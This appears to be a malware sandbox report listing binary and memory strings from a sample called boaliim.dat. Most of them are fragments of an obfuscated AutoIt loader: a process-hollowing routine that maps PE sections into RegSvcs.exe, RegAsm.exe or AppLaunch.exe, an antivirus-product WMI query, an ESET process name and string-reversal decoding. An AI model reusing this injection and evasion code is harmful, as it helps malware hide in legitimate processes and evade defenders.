Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: minoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d620c1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe2ff4bb477760319f8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da0ceea6516a6b0c
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readimagefileexecoptions
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb23f2a4516c7d279f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da03e6af597b4b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff5a1517a7e309f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da1ce2a45f7b4034b1a0w
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qrsbbkj-7wo8i291jb09ygiu694l^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c82fecad5d6b750ce
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemorybase3f2a0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f5556609f{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\ntmarta.dllb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fexpfc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemmajorversion4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommitfreeblockthreshold#
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversionold*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemmajorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversionold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cwvoayzpefzjbexpebfcjexe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommittotalfreethreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommitfreeblockthreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemoryheap
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlystaticserverdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlysharedmemorybase
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommitfreeblockthresholds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapdecommittotalfreethresholda
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readonlystaticserverdatah
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readimagefileexecoptionsw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagesubsystemminorversionold~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readimagefileexecoptionsnold7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ryoboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dz\temp\
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gvqj.txt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\p
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: checkint
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: denarioy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mainpe~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: chrome
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cbsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: thread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ysize`@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: title`?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: flags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: desktop
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eggsh[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tagwordb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tagwordm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dr2ord
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sscs d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segfst=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segds"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seges$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: overlay
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seggs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pagesx]
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pages
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magic(_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magich_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eflags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mutant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: spareh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segcse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segssj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tagwordg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segfs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: machinei
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magic8t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: utant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ordro
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magic
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: spare2
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: closehandle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: andle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: closehandle0d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segcs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seges
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eflagsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nameh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: spare
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: andleb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwordx
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: resumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pare2$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ygiu694lr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002k
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unionofvirtualsizeandphysicaladdressd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de0fe3ac427d6126889cf80esq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7c~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7ck
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unionofvirtualsizeandphysicaladdress
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de0fe3ac427d61268995eb0e7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word magic;byte majorlinkerversion;<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unionofvirtualsizeandphysicaladdress)
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unionofvirtualsizeandphysicaladdressmp"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\knmo\boaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de06c289745d400699b7ca007cz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword virtualaddress; dword sizeofblockg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0el
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327cy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b82
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387c?
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "mtext", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9fe2ff4bb477760319f = iniread($_y0x3856f9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "k3ysx", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))|$
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))9?g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = ($_y0x3856f9cc0ceea6516a6b0c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _reverse($_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c711ebad5e41 = stringlen($_y0x3856f9dd11d4bc42717c329f)40t
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ekrn.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msctf.dllk(
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e720e1ad536c7b3aa8a6c63956956ba47a4d7cc22b1629~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte inheritedaddressspace;byte readimagefileexecoptions;exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029xe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\regsvcs.exeregsvcs.execw
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exel5
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c60fe3be51687b66f4a0 = dllopen("advapi32.dll")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exeenu
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elseif fileexists($_y0x3856f9c720edad536c4d3ba38eeb3253b8) thend)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c711ebad5e41 < 1 then return seterror(1, 0, "")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _stringbetween($s_string, $s_start, $s_end, $v_case = -1)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $s_end = stringregexpreplace($s_end, $s_pattern_escape, "\\$1")9)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c60df5b1406c5a34b591d6 = $_y0x3856f9cf1ce2bc69[5]orv()
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9f82ff5f10441, 1, "current_user")4q7
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c037271
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct"))
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_iswow64process($_y0x3856f9c61ef5a7537d61269f)ktp*
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6toar1049wfld4e75
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l $_y0x3856f9da11e4a0516a610c = dllstructcreate("char[" & $_y0x3856f9c711ebad5e41 + 1 & "]")015
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da11e4a0516a610c, 1, $_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf11f5ad4641 = dllcall("msvcrt.dll", "ptr:cdecl", "_strrev", "struct*", $_y0x3856f9da11e4a0516a610c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or $_y0x3856f9cf11f5ad4641[0] = 0 then return seterror(2, 0, "")p
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regsvcs.exe")g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regasm.exe")~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\applaunch.exe")h
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regsvcs.exe")c
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regasm.exe")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\applaunch.exe")6v
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c720edad536c4d21b18ce13c7ad23891 = ($
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $_y0x3856f9de1ee8a15e6c77279f)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c71deeb255577407a78ecb36518053 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "sizeofrawdata")/
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b = $_y0x3856f9de06c289745d400699b7ca007c + dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "pointertorawdata")$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "virtualaddress")(
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c718eeba446d73399590f5327c = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "unionofvirtualsizeandphysicaladdress")7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c718eeba446d73399590f5327c and $_y0x3856f9c718eeba446d73399590f5327c < $_y0x3856f9c71deeb255577407a78ecb36518053 then $_y0x3856f9c71deeb255577407a78ecb36518053 = $_y0x3856f9c718eeba446d73399590f5327cq
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991), 1, dllstructgetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b), 1))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c718eeba446d7339879deb2540927991 <= $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 and $_y0x3856f9c718eeba446d7339879deb2540927991 + $_y0x3856f9c71deeb255577407a78ecb36518053 > $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 thenc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da1ce2a45f7b4034b1a0 = dllstructcreate("byte[" & $_y0x3856f9c71deeb2555a7326a3abea3b4a8253 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b + ($_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 - $_y0x3856f9c718eeba446d7339879deb2540927991))b
